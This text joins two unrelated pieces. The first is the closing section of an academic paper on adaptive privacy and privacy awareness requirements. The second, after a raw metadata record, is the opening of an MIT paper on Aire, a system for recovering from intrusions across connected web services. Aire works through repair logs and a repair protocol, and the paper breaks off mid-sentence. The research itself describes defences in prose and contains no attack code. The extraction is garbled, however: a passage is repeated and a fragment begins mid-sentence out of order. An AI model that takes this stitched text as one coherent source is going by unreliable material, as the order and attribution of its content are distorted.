No-PAR case. The rationale for this outcome is derived from the view that for a specific $n$ value, and as the number of agents in a group increases, there is also an increased likelihood of the number of receiving agents whose neighbours would be more than $n$. Conversely, for a smaller group of agents (groups 1, 2 and 3), smaller values of $n$ are required to achieve a statistically different utility. A pattern similar to Case4 is also roughly observable for Case3 that involves varying $Th$ values across groups. As such, for groups with smaller number of agents, smaller values of $Th$ are required to achieve a statistically different utility. The key observation is that $n$ and $Th$ are mutable factor that change depending on the number of agents in the group. As the number of agents in a group increases, the resulting utility of an adaptation action for a specific $n$ and $Th$ also become more significantly different from No-PAR. ### VII. Conclusion and Further Work In this paper, we presented an adaptive privacy framework that enables the runtime selective disclosure of personal information. Our approach is based on the rationale that for the appropriate disclosure of information from a sender to a receiver, some privacy awareness requirements (PAR) need to be satisfied. Such requirements underpin the ability of applications to identify the attributes to monitor in order to detect privacy threats, the discovery of a privacy threat before information is disclosed, and an understanding of the utility of disclosure, which includes the severity of the threat as well as the benefit of disclosure in the face of the discovered threat. We evaluated our framework from two viewpoints. First, we showed that applications that fail to satisfy PAR are unable to regulate information flow based on the utility of disclosure. Secondly, we showed that applications that satisfy PAR can regulate the disclosure of information. We demonstrated the usefulness of PAR that crosscuts a spectrum, where at one end is risk-aversion (with the aim of user applications minimising exposure to privacy threats), and the other end is risk-taking (with the objective of maximising benefit amidst increasing threat severity and declining utility). Although we used a single motivating example to evaluate our approach, we suggest that our approach is generalisable to other domain where disclosure can be modelled as the transfer of information between agents. The key benefit of our approach to engineering adaptive software is that PAR can serve as useful input into the planning and execution phases of the adaptation cycle. PAR are useful for planning as it provides an understanding of the utility of information disclosure. We also expect PAR to be useful for execution. This is because it provides a rationale for software models that need to change in-order to preserve privacy. While we have not focused on the semantics of such change, we expect it to involve an adaptation manager carrying out some actions. These include altering or removing disclosure behaviour by updating the LTS representation of the application. Other execution approaches may include refining user privacy requirements, or learning new inference rules in the context model to subsequently enable better adaptation. Another benefit of our approach to software engineering is that it relies on a minimal subset of general software engineering models. For example, there is no need to explicitly model a malicious user in order to discover privacy threats. Generated interaction networks used in the evaluation of our approach closely resemble random networks that are typical of mobile applications. Further work will be required to generalise our approach to other forms of networks such as the small-world or networks where the power-law distribution is not assumed. Furthermore, our framework is extensible to utilise richer models of context. Thus, we aim to investigate other models that addresses possible uncertainties that can be introduced by mobility and changing context. The wider question that our framework poses is that of engineering existing legacy application into an adaptive privacy protecting one. In future work, we plan to investigate an aspect-oriented and component based approach to adaptive privacy that is amenable to legacy systems. Finally, we intend to investigate the notion of entropy and transience in adaptive privacy. This is necessary because the sensitivity of information may decay over time for a number of reasons. These include the transient nature of the knowledge of human agents, and the disclosed information becoming out of context or more inaccessible over time. ACKNOWLEDGMENT This work was supported, in part, by SFI grant 10/CE/I1855 (for CSET2) to Lero, Microsoft SEIF Award (2011) and the European Research Council. REFERENCES
{"Source-Url": "http://oro.open.ac.uk/37467/1/Engineering%20Adaptive%20Privacy%20-%20On%20the%20role%20of%20privacy%20awareness%20requirements.pdf", "len_cl100k_base": 11995, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 44637, "total-output-tokens": 13920, "length": "2e13", "weborganizer": {"__label__adult": 0.00039458274841308594, "__label__art_design": 0.0005850791931152344, "__label__crime_law": 0.0011920928955078125, "__label__education_jobs": 0.0014438629150390625, "__label__entertainment": 0.00011199712753295898, "__label__fashion_beauty": 0.00022804737091064453, "__label__finance_business": 0.000835418701171875, "__label__food_dining": 0.00037288665771484375, "__label__games": 0.0010747909545898438, "__label__hardware": 0.0010633468627929688, "__label__health": 0.0007481575012207031, "__label__history": 0.0004019737243652344, "__label__home_hobbies": 0.0001341104507446289, "__label__industrial": 0.0005054473876953125, "__label__literature": 0.0005173683166503906, "__label__politics": 0.0006480216979980469, "__label__religion": 0.0003657341003417969, "__label__science_tech": 0.2110595703125, "__label__social_life": 0.00016999244689941406, "__label__software": 0.04364013671875, "__label__software_dev": 0.7333984375, "__label__sports_fitness": 0.0002448558807373047, "__label__transportation": 0.000522613525390625, "__label__travel": 0.0002036094665527344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 55830, 0.02881]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 55830, 0.43395]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 55830, 0.9101]], "google_gemma-3-12b-it_contains_pii": [[0, 76, false], [76, 5448, null], [5448, 11234, null], [11234, 16571, null], [16571, 23019, null], [23019, 29049, null], [29049, 34701, null], [34701, 40745, null], [40745, 45899, null], [45899, 50073, null], [50073, 55830, null]], "google_gemma-3-12b-it_is_public_document": [[0, 76, true], [76, 5448, null], [5448, 11234, null], [11234, 16571, null], [16571, 23019, null], [23019, 29049, null], [29049, 34701, null], [34701, 40745, null], [40745, 45899, null], [45899, 50073, null], [50073, 55830, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 55830, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 55830, null]], "pdf_page_numbers": [[0, 76, 1], [76, 5448, 2], [5448, 11234, 3], [11234, 16571, 4], [16571, 23019, 5], [23019, 29049, 6], [29049, 34701, 7], [34701, 40745, 8], [40745, 45899, 9], [45899, 50073, 10], [50073, 55830, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 55830, 0.17919]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
40ef2549c3716efc21c5f84bc213e41164ecb2fa
Asynchronous intrusion recovery for interconnected web services The MIT Faculty has made this article openly available. Please share how this access benefits you. Your story matters. <table> <thead> <tr> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td>As Published</td> <td><a href="http://dx.doi.org/10.1145/2517349.2522725">http://dx.doi.org/10.1145/2517349.2522725</a></td> </tr> <tr> <td>Publisher</td> <td>Association for Computing Machinery</td> </tr> <tr> <td>Version</td> <td>Author’s final manuscript</td> </tr> <tr> <td>Citable Link</td> <td><a href="http://hdl.handle.net/1721.1/91473">http://hdl.handle.net/1721.1/91473</a></td> </tr> <tr> <td>Terms of Use</td> <td>Creative Commons Attribution-Noncommercial-Share Alike</td> </tr> <tr> <td>Detailed Terms</td> <td><a href="http://creativecommons.org/licenses/by-nc-sa/4.0/">http://creativecommons.org/licenses/by-nc-sa/4.0/</a></td> </tr> </tbody> </table> Asynchronous intrusion recovery for interconnected web services Ramesh Chandra, Taesoo Kim, and Nickolai Zeldovich MIT CSAIL Abstract Recovering from attacks in an interconnected system is difficult, because an adversary that gains access to one part of the system may propagate to many others, and tracking down and recovering from such an attack requires significant manual effort. Web services are an important example of an interconnected system, as they are increasingly using protocols such as OAuth and REST APIs to integrate with one another. This paper presents Aire, an intrusion recovery system for such web services. Aire addresses several challenges, such as propagating repair across services when some servers may be unavailable, and providing appropriate consistency guarantees when not all servers have been repaired yet. Experimental results show that Aire can recover from four realistic attacks, including one modeled after a recent Facebook OAuth vulnerability; that porting existing applications to Aire requires little effort; and that Aire imposes a 19–30% CPU overhead and 6–9 KB/request storage cost for Askbot, an existing web application. 1 Introduction In an interconnected system, such as today’s web services, attacks that compromise one component may be able to spread to other parts of the system, making it difficult to recover from an intrusion. For example, consider a small company that relies on a customer management web service (such as Salesforce) and an employee management web service (such as Workday) to conduct business, and uses a centralized access control web service to manage permissions across all of its services. The servers of these web services interact with each other on the company’s behalf, to synchronize permissions, update customer records, and so on. If an attacker exploits a bug in the access control service, she could give herself write access to the employee management service, use these new-found privileges to make unauthorized changes to employee data, and corrupt other services. Manually recovering from such an intrusion requires significant effort to track down what services were affected by the attack and what changes were made by the attacker. Many web services interact with one another using protocols such as OAuth [3], REST, or other APIs [12, 14, 22, 23], and several recent vulnerabilities in real web services [9–11, 13, 20] could be used to launch attacks like the one just described. For example, a recent Facebook OAuth vulnerability [9] allowed an attacker to obtain a fully privileged OAuth token for any user, as long as the user mistakenly followed a link supplied by the attacker; the attacker could have used this token to corrupt the user’s Facebook data. If other applications accessed that user’s data on Facebook, the attack would have spread even further. So far, we do not know of serious attacks that have exploited such vulnerabilities, perhaps because interconnected web services are relatively new. However, we believe that it is only a matter of time until attacks on interconnected web services emerge. This paper takes the first steps toward automating recovery from such attacks. We identify the challenges that must be addressed to make recovery practical, and present the design and implementation of Aire, a system for recovering from intrusions in a large class of loosely coupled web services, such as Facebook, Google Docs, Dropbox, and Amazon S3. Aire works as follows. Each web service that wishes to support recovery runs Aire on its servers. During normal operation, Aire logs information about the service’s execution, as well as requests received from and sent to other services, thus tracking dependencies across services. When an administrator of a service learns of a compromise, he invokes Aire on the service, and asks Aire to cancel the attacker’s request. Aire repairs the local state of the service using selective re-execution [7, 15], and propagates repair to other web services that may have been affected, so they can recover in turn, until all affected services are repaired. In addition to recovering from attacks, Aire can similarly help recover from user or administrator mistakes. Aire’s contribution over past work [7, 16] is in addressing three main challenges faced by intrusion recovery across web services: **Decentralized, asynchronous repair (§3).** One possible design for a recovery system is to have a central repair coordinator that repairs all the services affected by an attack. However, this raises two issues. First, web services do not have a strict hierarchy of trust and so there is no single system that can be trusted to orchestrate repair across multiple services. Second, during repair, some services affected by an attack may be down, unreachable, or otherwise unavailable. Waiting for all services to be online in order to perform repair would be impractical and might unnecessarily delay recovery in services that are already online. Worse yet, an adversary might purposely add her own server to the list of services affected by an attack, in order to prevent timely recovery. Aire solves these issues with two ideas. First, to avoid services having to trust a central repair coordinator, Aire performs decentralized repair: Aire defines a repair protocol that allows services to invoke repair on their past requests to other services, as well as their past responses to requests from other services. Second, to repair services after an intrusion without waiting for unavailable services, Aire performs asynchronous repair: a service repairs its local state as soon as it is asked to perform a repair, and if any past requests or responses are affected, it queues a repair message for other services, which can be processed when those services become available. While Aire’s repair infrastructure takes care of many issues raised by intrusion recovery, there are two remaining challenges that require application-specific changes to support repair: **Repair access control (§4).** Repair operations themselves can be a security vulnerability, and an application must ensure that Aire’s repair protocol does not give attackers new ways to subvert a web service. To this end, Aire provides an interface for applications to specify access control policies for every repair invocation. **Reasoning about partially repaired states (§5).** With Aire’s asynchronous repair, some services affected by an attack could be already repaired, while others might not have received or processed their repair messages yet. Such a partially repaired state could appear inconsistent to clients or other services, and lead to unexpected application behavior. To help developers handle partially repaired states in their applications, we propose the following contract: repair should be indistinguishable from concurrent requests issued by some client on the present state of the system. This contract largely reduces the problem of dealing with partially repaired states to the existing problem of dealing with concurrent clients, which many web application developers already have to reason about. To evaluate Aire’s design, we implemented a prototype of Aire for Django-based web applications. We ported three existing web applications to Aire: an open-source clone of StackOverflow called Askbot [1], a Pastebin-like application called Dpaste, and a Django-based OAuth service. We also developed our own shared spreadsheet application. In all cases, Aire required minimal changes to the application source code. As there are no known attacks that propagate through interconnected web services in the wild, we construct four realistic intrusions that involve the above web applications, including a scenario inspired by the recent Facebook OAuth vulnerability, and demonstrate that Aire can recover from them. We also show that Aire can recover a subset of services from attack even when others are unavailable. Porting an application to Aire required changing under 100 lines of server-side code for the applications mentioned above. Supporting partial repair can require changing the API of a service; the most common example that we found is adding branches to a versioning API. Finally, we show that Aire’s performance costs are moderate, amounting to a 19–30% CPU overhead and 6–9 KB/request storage cost in the case of Askbot. ### 2 Overview Aire’s goal is to undo the effects of an unwanted operation (specified by some user or administrator) that propagated through Aire-enabled services, which means producing a state that is consistent with the attack never having taken place. Aire expects that the user or administrator will pinpoint the unwanted operation (e.g., the initial intrusion into the system) to initiate recovery. In practice, the user or administrator will probably use some combination of auditing, intrusion detection, and analysis [17, 18] to find the initial intrusion point. Aire assumes that each service exposes an API which defines a set of operations that can be performed on it, and that services and clients interact only via these operations; they cannot directly access each other’s internal state. This model is commonplace in today’s web services, such as Amazon S3, Facebook, Google Docs, and Dropbox. Under this model, an attack is an API operation that exploits a vulnerability or misconfiguration in a service and causes undesirable changes to the service’s state. These state changes can propagate to other services, either as a result of this service invoking operations on other services or vice-versa. Aire aims to undo both the initial changes to the service state, as well as any changes propagated to other services. On each individual service, Aire repairs the local state in a manner similar to the Warp intrusion recovery sys- tem [7], by rolling back the database state affected by the attack and re-executing past requests to the service that were affected by the attack. If during local repair Aire determines that requests or responses to other services might have been affected, Aire asynchronously sends repair messages to those services. Each repair message specifies which request or response was affected by repair, and includes a corrected version of the request or response. When a service receives a repair message, Aire initiates local recovery, after checking permissions for the repair message. Once repair messages propagate to all affected services, the attack’s effects will be removed from the entire system. However, even before repair messages propagate everywhere, applications that are already online can repair their local state. With API-level repair, Aire can recover from attacks that exploit misconfigurations of a service or vulnerabilities in a service’s code, and from accidental user mistakes. This includes several scenarios, such as the ones described in §1, but does not include attacks on the OS kernel or the Aire runtime itself. In the rest of this section we review Warp and present Aire’s system architecture and assumptions. 2.1 Review of Warp Aire’s recovery of a service’s local state is inspired by Warp [7]. This section provides a brief summary of Warp’s design, and its rollback-redo approach to recovery, as it relates to Aire. Much as in Aire, an administrator of a Warp system initiates recovery by specifying an attack request to undo. During normal execution of a web application, Warp builds up a repair log that will be used to recover from attacks. In particular, Warp records HTTP requests and their responses, and database queries issued by each request and their results. Warp also maintains a versioned database that stores all updates to every database row. Given the above recorded information, Warp recovers from an attack as follows. First, Warp rolls back the database rows modified by the attack request to the request’s original execution time. Second, Warp uses its logs to identify database queries that might have read the rows affected by the attack, or queries that might have modified the rows that have been rolled back, and re-executes the corresponding requests (except for the attack request, which is skipped). For each re-executed request, Warp rolls back the database rows accessed by that request to the time of the request’s original execution, and applies the same algorithm to find other requests that might have been indirectly affected. This algorithm finishes after it has re-executed all requests affected by the attack, thereby reverting all of the attack’s effects. Figure 1: Overview of Aire’s design. Components introduced or modified by Aire are shaded. Circles indicate places where Aire intercepts requests from the original web service. Not shown are the detailed components for services B and C. 2.2 Aire architecture Figure 1 provides an overview of Aire’s overall design. Every web service that supports repair through Aire runs an Aire repair controller, whose design is inspired by Warp [7]. The repair controller maintains a repair log during normal operation by intercepting the original service’s requests, responses, and database accesses. The repair controller also performs repair operations as requested by users, administrators, or other web services, by rolling back affected state and re-executing affected requests. In order to be able to repair interactions between services, Aire intercepts all HTTP requests and responses to and from the local system. Repairing requests or responses later on requires being able to name them; to this end, Aire assigns an identifier to every request and response, and includes that identifier in an HTTP header. The remote system, if it is running Aire, records this identifier for future use if it needs to repair the corresponding request or response. During repair, if Aire determines that the local system sent an incorrect request or response to another service, it computes the correct request or response, and sends it along with the corresponding ID to the other service. Aire’s repair messages are implemented as just another API on top of HTTP (with one special case, when a server needs to get in touch with a past client). Aire supports four kinds of operations in its repair API. The two most common repair operations involve replacing either a request or response with a different payload. Two other operations arise when Aire determines that the local service should never have issued a request in the first place, or that it should have issued a request while none was originally performed; in these cases, Aire asks the remote service to either cancel a past request altogether, or to create a new request. To perform repair, Aire makes several assumptions. First, Aire assumes that each service’s web software stack is in the trusted computing base. This includes the OS, the language runtime, the database server, and the application framework (such as Rails or Django) that the service operates on. Aire cannot recover from an attack that compromises these system components. Second, Aire’s repair propagation assumes that the services and clients affected by an attack are running Aire. If some client or service does not run Aire, then Aire will not be able to repair the effects of the attack on that client or service (and any other clients and services to which the attack spread from there). If a service cannot propagate repair to another machine, Aire notifies the service’s administrator of the repair that cannot be propagated, so that the administrator can take remedial action (e.g., manual recovery). As a corollary, Aire assumes that attacks do not propagate through Web browsers, as our current Aire prototype does not support browser clients, and hence cannot track or repair from attacks that spread through users’ browsers. It may be possible to add repair for browsers in a manner similar to Warp’s shadow browser [7]. Finally, Aire assumes that each service has an appropriate access control policy that denies access to unauthorized clients requesting repair, and that each service and its clients support partially repaired states. If the former assumption does not hold, attackers would be able to use repair to make unauthorized changes to a service. If the latter assumption is broken, clients may behave incorrectly due to inconsistencies between services. ### 3 Distributed repair The next three sections delve into the details of Aire’s design. This section describes Aire’s asynchronous repair protocol, §4 focuses on permission checking for repair messages between services, and §5 discusses how applications can handle partially repaired states that arise during asynchronous repair. #### 3.1 Repair protocol Each Aire-enabled web service exports a repair interface that its clients (including other Aire-enabled web services) can use to initiate repair on it. Aire’s repair interface is summarized in Table 1. Aire’s repair begins when some client (either a user or administrator, or another web service) determines that there was a problem with a past request, or that it incorrectly missed issuing a past request. The client initiates repair on the corresponding service by using the `replace` or `delete` operations to fix the past request, or by using the `create` operation to create a new request in the past. Sometimes, a past response of a service is incorrect, in which case the service initiates repair on the corresponding client using the `replace_response` operation. We now describe these operations in more detail. <table> <thead> <tr> <th>Command and parameters</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>replace (request_id, new_request)</td> <td>Replaces past request with new data</td> </tr> <tr> <td>delete (request_id)</td> <td>Deletes past request</td> </tr> <tr> <td>create (request_data, before_id, after_id)</td> <td>Executes new request in the past</td> </tr> <tr> <td>replace_response (response_id, new_response)</td> <td>Replaces past response with new data</td> </tr> </tbody> </table> **Table 1:** The repair protocol between Aire servers. When repairing a request, Aire updates its repair log and versioned database, just like it does during normal operation, so that a future repair can perform recovery on an already repaired request. This is important because asynchronous repair can cause a request to be repaired several times as repair propagates through all the affected services. Aire must control who can issue repair operations, to ensure that clients or other web services cannot make unauthorized changes via the repair interface. Aire delegates this access control decision to the original service, as access control policies can be service-specific: for example, a service might require a stronger form of authentication (e.g., Google’s two-step authentication) when a client issues a repair operation than when it issues a normal operation; or a platform such as Facebook might block repair requests from a third-party application if the application is attempting to modify the profile of a user that has since uninstalled that application. In some cases, appropriate credentials for issuing a repair operation on another web service may be unavailable. For example, Aire on a service A may need to repair a request it previously issued on behalf of a specific user to a remote service B; however, if A no longer has the user’s credentials to B, it cannot invoke repair on B. Aire treats this situation as if service B is not available, and queues the repair on A for later. Once the user logs in to A and provides credentials for B, A can use the user’s credentials to propagate repair. ### 2.3 Assumptions To perform repair, Aire makes several assumptions. First, Aire assumes that the service’s web software stack is in the trusted computing base. This includes the OS, the language runtime, the database server, and the application framework (such as Rails or Django) that the service operates on. Aire cannot recover from an attack that compromises these system components. Second, Aire’s repair propagation assumes that the services and clients affected by an attack are running Aire. If some client or service does not run Aire, then Aire will not be able to repair the effects of the attack on that client or service (and any other clients and services to which the attack spread from there). If a service cannot propagate repair to another machine, Aire notifies the service’s administrator of the repair that cannot be propagated, so that the administrator can take remedial action (e.g., manual recovery). originally provided to the original request, including the URL, HTTP headers, query parameters, etc. When Aire’s controller performs a replace operation, it repairs the local state to be as if the newly supplied request happened instead of the original request. If other requests or responses turn out to be affected by this repair, Aire queues appropriate repair API calls for other services. The delete operation is similar to replace, but it is used when a client determines that it should not have issued some request at all. In this case, delete instructs the Aire repair controller to eliminate all side-effects of the request named by request_id. Creating new requests. Sometimes, repair requires adding a new request “in the past.” For example, if an administrator forgot to remove a user from an access control list when he should have been removed, one way to recover from this mistake is to add a new request at the right time in the past to remove the user from the access control list. The create call allows for this scenario. One challenge with create is in specifying the time at which the request should execute. Different web services do not share a global timeline, so the client cannot specify a single timestamp that is meaningful to both the client and the service. Instead, the client specifies the time for the newly created request relative to other messages it exchanged with the service in the past. To do this, the client first identifies the local timestamp at which it wishes the created request to execute; then it identifies its last request before this timestamp and the first request after this timestamp that it exchanged with the service, and instructs the service to run the created request at a time between these two requests. The before_id and after_id parameters to the create call name these two requests. The above scheme is not complete: it allows the client to specify the order of the new request with respect to past requests the client exchanged with the service executing the new request, but it does not allow the client to specify ordering with respect to arbitrary messages in the system. More general ordering constraints would require services to exchange large vector timestamps or dependency chains, which could be costly. As we have not yet found a need for it, we have not incorporated it into Aire’s design. Repairing responses. The replace_response operation allows a server to indicate that a past response to a client, named by its response_id, was incorrect, and to supply a corrected version of the response in new_response. In web services, clients initiate communication to the server. However, to invoke a replace_response on a client, the service needs to initiate communication to the client. This raises two issues. First, the server needs to know where to send the replace_response call for a client. To address this issue, Aire associates a notifier URL with each request; if the server wants to contact the client to repair the response, it sends a request to the associated notifier URL. Second, once a client gets a replace_response call from a service, it needs to authenticate the service. During normal operation, as the client initiates communication, it typically authenticates the server by communicating with it over TLS (which verifies the server’s X.509 certificate). To allow the client to use the same authentication mechanism during repair, the service sends only a response repair token to the client’s notifier URL, instead of the entire replace_response call; when a client receives a response repair token, it contacts the server and asks the server to provide the replace_response call for that token. This way, the client can appropriately authenticate the server, by validating its X.509 certificate. Integrating Aire with HTTP. In order to name requests and responses during subsequent repair operations, Aire must assign a name to every one of them. To do this, Aire interposes on all HTTP requests and responses during normal operation, and adds headers specifying a unique identifier that will be used to name every request. To ensure these identifiers uniquely name a request (or response) on a particular server, Aire assigns the identifier on the service handling the request (or receiving the response); it becomes the responsibility of the other party to remember this identifier for future repair operations. Specifically, Aire adds an Aire-Response-Id: header to every HTTP request issued from a web service; this identifier will name the corresponding response. The server receiving this request will store the response identifier, and will use it later if the response must be repaired. Conversely, Aire adds an Aire-Request-Id: header to every HTTP response produced by a web service; this identifier assigns a name to the HTTP request that triggered this response. A client can use this identifier to refer to the corresponding request during subsequent repair. Aire also adds an Aire-Notifier-URL: header to every issued request. To make it easier for clients to use Aire’s repair interface, Aire’s repair API encodes the request being repaired (e.g., new_request for replace) in the same way as the web service would normally encode this request. The type of repair operation being performed (e.g., replace or delete) is sent in an Aire-Repair: HTTP header, and the request_id being repaired is sent in an Aire-Request-Id: header. Thus, to fix a previous request, the client simply issues the corrected version of the request as it normally would, and adds the Aire-Repair: replace and Aire-Request-Id: headers to indicate that this request should replace a past operation. In addition to requiring relatively few changes to client code, this also avoids introducing infrastructure changes (e.g., modifying firewall rules to expose a new service). 3.2 Local repair As part of local repair of a service, Aire re-executes API operations that were affected by the attack. It is possible that one of these operations will execute differently due to repair, and issue a new HTTP request that it did not issue during the original execution. In that case, Aire must issue a create repair call to the corresponding web service, in order to create a new request “in the past.” Re-execution can also cause the arguments of a previously issued request to change, in which case Aire queues a replace message to the remote web service in question. One difficulty with both create and replace calls is that to complete local repair, the application needs a response to the HTTP requests in these calls. However, Aire cannot block local repair waiting for the response. To resolve this tension, Aire tentatively returns a “time-out” response to the application’s request, which any application must already be prepared to deal with; this allows local repair to proceed. Once the remote web service processes the create or replace operation, it will send back a replace_response that replaces the time-out response with the actual response to the application’s request. At this point, Aire will perform another repair to fix up the response. When re-execution skips a previously issued request altogether, Aire queues a delete message. Finally, if re-execution changes the response of a previously executed request, or computes the response for a newly created request, Aire queues a replace_response message. Aire maintains an outgoing queue of repair messages for each remote web service. If multiple repair messages refer to the same request or the same response, Aire can collapse them, by keeping only the most recent repair message. Sometimes, Aire might be unable to send a repair message, either because the original request or response did not include the dependency-tracking HTTP headers identifying the web service to send the message to, or because the communication to the remote web service timed out; in either case, Aire notifies the application (as we discuss in §4). Aire also aggregates incoming repair messages in an incoming queue, and can apply the changes requested by multiple repair operations as part of a single local repair. 3.3 Convergence Recall that Aire’s goal is to produce a state that is consistent with the attack never having taken place (attack-free for short). We will now informally argue that Aire’s repair protocol converges to this state, assuming no failures (e.g., unreachable services or insufficient credentials, which are discussed in the next section). Consider the list \( L \) of all messages (requests and responses between services) that were affected by the attack, sorted by receive time. We will argue that Aire eventually repairs the recipients of all these messages (i.e., servers that ran affected requests or clients that received affected responses). For simplicity, assume that each service keeps a complete timeline of its state (e.g., a checkpoint at every point in time), and that each service handled a request or response instantaneously at the time it was received. As repair messages propagate between services, the state timeline of each service will be repaired up to increasingly more recent points in time, eventually reaching the present. The first message in \( L \) must be the initial attack at time \( t_0 \). Local repair rolls back any state modified as a result of this message to before \( t_0 \), and possibly re-executes some operations on that service. Since inputs to the service up to and including \( t_0 \) are now attack-free, the state timeline of that service is now attack-free up to and including \( t_0 \). All other services are also attack-free up to and including \( t_0 \), since the attack did not propagate to any other services as of \( t_0 \). Now we argue by induction on the times at which messages in \( L \) were received. Suppose that all state timelines are attack-free as of some \( t_i \), and the next message \( m \) in \( L \) is at \( t_{i+1} > t_i \). Consider the service \( s \) that sent \( m \) as a result of some execution \( e \). We know that \( m \) was sent at or before \( t_{i+1} \), that \( s \) received no attack-affected message between \( t_i \) and \( t_{i+1} \), and that the timeline of \( s \) is attack-free up to and including \( t_i \). This means that all inputs to \( e \) up to the point when it sent \( m \) are now attack-free. Thus, local repair on \( s \) will re-execute \( e \), produce the attack-free version of \( m \), and send a repair message for \( m \). Once the recipient of this repair message performs local repair, its timeline (and the timelines of all other services) will be attack-free up to and including \( t_{i+1} \). By induction, Aire will eventually repair all timelines to the present. In addition to producing the goal state, we would like Aire to eventually stop sending repair messages. This is true as long as the local repair implementation is stable: that is, when processing a repair message for time \( t \), it produces repair messages only for requests or responses at times after \( t \) (i.e., does not change its mind about previous messages). Stable local repair ensures that repair messages progress forward in time starting from the attack, and eventually converge upon reaching the present time. Local repair is stable if re-execution is deterministic, which Aire achieves by recording and replaying sources of non-determinism as in Warp [7]. 4 Repair access control Access control is important because Aire’s repair itself must not enable new ways for adversaries to propagate from one compromised web service to another. For ex- ample, a hypothetical design that allows any client with a valid request identifier to issue repair calls for that request is unsuitable, because an adversary that compromises a service storing many past request identifiers would be able to make arbitrary changes to those past requests, af- flecting many other services; this is something an attacker would not be able to do in the absence of Aire. Aire requires that every repair API call be accompanied with credentials to authorize the repair operation. Aire delegates access control decisions to the application be- cause principal types, format of credentials, and access control policies can be application-specific. For exam- ple, some applications may use cookies for authentication while others may include an access token as an additional HTTP header; and some applications may allow any user with a currently valid account to repair a past request is- issued by that user, while others may allow only users with special privileges to invoke repair. In the special case of replace_response messages, the repair message can be authenticated using the server’s X.509 certificate, as discussed in §3.1, although an application developer can require (and supply) other credentials if needed. The interface between Aire and an Aire-enabled ser- vice is shown in Table 2. Services running Aire export an authorize function that Aire invokes when it re- ceives a repair message; Aire passes to the function the type of repair operation (create, replace, delete, or replace_response), and the original and new versions of the request or response to repair (denoted by the origi- nal and repaired parameters). The authorize function’s return value indicates whether the repair should be al- lowed (using credentials from the repaired message); if the repair is not allowed, Aire returns an authorization error for the repair message. To perform access control checks, the service may need to read old database state (e.g., to look up the principal that issued the original request). For this purpose, Aire provides the application read-only access to a snapshot of Aire’s versioned database at the time when the orig- inal request executed; the specific interface depends on how the application’s web framework provides database access (e.g., Django’s ORM). Once a repair operation is authorized, Aire re-executes the new request, if any. As part of request re-execution, the application can apply other authorization checks, in the same way that it does for any other request during normal operation. If a repair message sent to a remote server returns an authorization error (e.g., because the credentials have ex- pired) or times out, Aire notifies the application of the error by invoking the notify function (and continues to process other repairs in the meantime). Once the appli- cation obtains appropriate credentials for a failed repair operation, it can use the retry function to ask Aire to re- send the repair message. In the OAuth example above, the client application could display the failed repair message to the user whose OAuth token was stale, and prompt the user for a fresh OAuth token or ask if the message should be dropped altogether. 5 Reasoning about partially repaired state Aire’s asynchronous repair exposes the state of a ser- tice to its clients immediately after local repair is done, without waiting for repair to complete on other affected services. In principle, for a distributed system composed of arbitrary tightly coupled services, a partially repaired state can appear invalid to clients of the services. For ex- ample, if one of the services is a lock service, and during repair it grants a lock to a different application than it did during original execution, then in some partially repaired state both the applications could be holding the lock; this violates the service’s invariant that only one application can hold a lock at any time, and can confuse applications that observe this partially repaired state. However, Aire is targeted at web services, which are loosely coupled, in part because they are under different administrative domains and cannot rely on each other to be always available. In practice, for such loosely coupled web service APIs, exposing partially repaired states does not violate their invariants. In the rest of this section, we first present a model to reason about partially repaired states, and then provide an example of how a developer can modify a service to handle partially repaired states if necessary. 5.1 Modeling repair as API invocations Many web services and their clients are designed to deal with concurrent operations, and so web application de- velopers already have to reason about concurrent updates. For example, Amazon S3, a popular web service offering <table> <thead> <tr> <th>Function and parameters</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Functions implemented by the web service and invoked by Aire</td> <td></td> </tr> <tr> <td>authorize (repair_type, original, repaired)</td> <td>Checks if a repair message should be allowed</td> </tr> <tr> <td>notify (msg_id, repair_type, original, repaired, error)</td> <td>Notifies application of a problem with a remote repair message</td> </tr> <tr> <td>Functions implemented by Aire and invoked by the web service</td> <td></td> </tr> <tr> <td>retry (msg_id, updated_repair_type, updated_message)</td> <td>Resends a repair message</td> </tr> </tbody> </table> Table 2: The interface between Aire and the web service. A data storage interface, supports both a simple PUT/GET interface that provides last-writer-wins semantics in the face of concurrency, and an object versioning API that helps clients deal with concurrent writes. Building on this observation, we propose a contract: any repair of a service should be indistinguishable from a hypothetical repair client performing normal API calls to the service, in the present time. Note that this is just a way of reasoning about what effects a repair can have; Aire’s repair algorithm does not actually construct such a sequence of API calls. If repair operations are equivalent to a concurrent client, then application developers can handle partially repaired states simply by reasoning about this additional concurrent client, rather than having to reason about all possible timelines in which concurrent repair operations are happening. In particular, applications that already handle arbitrary concurrent clients require no changes to properly handle partially repaired states. This model fits many existing web services. For example, consider the scenario in Figure 2, illustrating operations on object X stored in Amazon S3. Initially, X had the value a. At time t1, an attacker writes the value b to X. At time t2, client A reads the value of X and gets back b. At time t3 the client reads the value of X again. In the absence of repair or any concurrent operations, A should receive the value b, but what should happen if, between t2 and t3, Amazon S3 determines the attacker’s write was erroneous and 